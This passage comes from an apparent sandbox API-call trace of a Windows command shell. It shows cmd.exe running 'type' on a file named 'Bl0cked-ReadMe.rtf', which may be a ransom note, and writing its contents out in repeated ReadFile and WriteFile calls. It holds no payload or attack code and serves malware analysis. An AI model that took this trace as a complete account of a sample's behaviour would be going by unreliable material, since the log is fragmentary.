(normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1efc50, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0141.000] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0141.000] GetConsoleTitleW (in: lpConsoleTitle=0x1efa80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.001] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0141.001] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0141.001] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0141.001] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0141.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.002] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1ef5e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef5e4) returned 0x2d0e90 [0141.002] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0141.002] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0141.002] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0141.002] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ee4f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0141.003] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0141.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.003] GetFileType (hFile=0x54) returned 0x1 [0141.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.003] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ee548 | out: lpFileSizeHigh=0x1ee548*=0x0) returned 0x1632 [0141.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.003] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.003] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.003] GetFileType (hFile=0x4c) returned 0x1 [0141.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.003] GetFileType (hFile=0x4c) returned 0x1 [0141.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.003] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.004] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] GetFileType (hFile=0x4c) returned 0x1 [0141.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.005] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.006] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.006] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.006] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.007] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.007] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] GetFileType (hFile=0x4c) returned 0x1 [0141.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.007] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType (hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType (hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType (hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType (hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] GetFileType (hFile=0x4c) returned 0x1 [0141.008] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.008] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.008] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.008] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.009] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] GetFileType (hFile=0x4c) returned 0x1 [0141.009] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.009] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.010] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.010] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.010] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.010] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.011] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.011] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.011] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.011] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.012] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.012] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.013] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.013] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] GetFileType (hFile=0x4c) returned 0x1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.013] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.013] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, 